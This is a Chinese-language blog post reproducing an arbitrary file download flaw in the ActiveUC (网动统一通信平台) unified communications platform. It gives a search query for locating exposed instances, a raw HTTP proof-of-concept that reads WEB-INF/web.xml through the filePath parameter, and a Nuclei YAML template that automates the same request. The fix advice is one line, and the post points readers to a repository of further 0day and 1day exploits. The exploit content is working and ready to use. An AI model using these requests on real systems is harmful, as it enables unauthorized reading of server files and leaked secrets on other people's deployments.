【漏洞复现】网动统一通信平台/网动统一通信平台ActiveUC存在任意文件下载

编程语言 2024-11-01 20:57
0 阅读


》》》产品描述《《《

        网动统一通信平台是采用统一的通信界面,将VoIP电话系统、电子邮件等多种沟通方式融合的企业IT平台。

》》》漏洞描述《《《

        网动统一通信平台是采用统一的通信界面,将VoIP电话系统、电子邮件等多种沟通方式融合的企业IT平台。网动统一通信平台(ActiveUC)存在任意文件读取下载、未授权密钥泄露。

》》》搜索语句《《《

title="网动统一通信平台(Active UC)"

》》》漏洞复现《《《

poc

GET /acenter/meetingShow!downloadDocument.action?filePath=WEB-INF/web.xml HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Connection: close

yaml

id: 网动统一通信平台/网动统一通信平台ActiveUC存在任意文件下载漏洞

info:
  name: 
  author: Kelichen
  severity: 
  description: 

  
http:
  - raw:
      - |
        GET /acenter/meetingShow!downloadDocument.action?filePath=WEB-INF/web.xml HTTP/1.1
        Host: {
   
   {Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Upgrade-Insecure-Requests: 1
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<web-app"
          - "<servlet>"
          - "<servlet-mapping>"

》》》修复建议《《《

关闭互联网接口

-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------

更多最新0day/1day POC&EXP移步----->Kelichen1113/POC-EXP (github.com)

-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------

猜你喜欢

目录

热门文章